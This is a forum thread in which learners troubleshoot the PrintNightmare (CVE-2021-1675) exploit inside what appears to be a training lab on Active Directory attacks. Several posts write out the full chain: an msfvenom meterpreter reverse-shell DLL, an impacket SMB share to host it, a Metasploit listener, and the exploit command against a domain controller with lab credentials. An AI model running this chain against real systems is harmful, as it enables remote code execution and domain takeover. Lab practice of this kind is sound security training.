Printnightmare (Active Directory Enumeration and Attacks)

TrentWalter · September 8, 2022, 5:12am

Hi I’m going through the Bleeding Edge Vulnerabilities in the AD Enumeration and Attacks Module. I’ve started the Target Machine and connected to the parrot attack box but I’m unable to get the printnightmare exploit working as the DC won’t connect to the smbshare on the attack box (ERROR_BAD_NETPATH - The network path was not found), I’ve done this exploit a few times before and had no issues but I wanted to check if we are meant to be able use this exploit for the questions at the end or not? Thanks

EDIT: Found Solution

Specify internal NICs IP address in smbserver command
sudo smbserver.py -smb2support new_share_name /path/to/share -ip 172.16.5.225
msfvenom
LHOST=172.16.5.225
msfconsole
set LHOST 172.16.5.225

god_f3lla · April 3, 2023, 6:34am

Hey! I could use a hint on this one. Keep getting the same error and I’m not sure how to interpret it. I use IP for the internal network and the credentials for user forend when running the exploit.

Crafting the payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

SMB server:
sudo smbserver.py -smb2support CompData /home/htb-student/123/backupscript.dll

MSF:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.5.225
set LPORT 8080
run

Running the exploit:
sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 ‘\172.16.5.225\CompData\backupscript.dll’

EDIT: I do everything after SSH to the Pwnbox as htb-student.

bit0n · April 22, 2023, 3:16pm

Like @TrentWalter mentioned SMB shares are only working on 172.16 network and not on 10.129. Wasted a whole day troubleshooting impacket and all the new versions.

marcalb · April 17, 2024, 4:12pm

Try taking out backupscript.dll from your “path”, your path should be the path to the folder where you keep the file.
sudo smbserver.py -smb2support CompData /home/htb-student/123/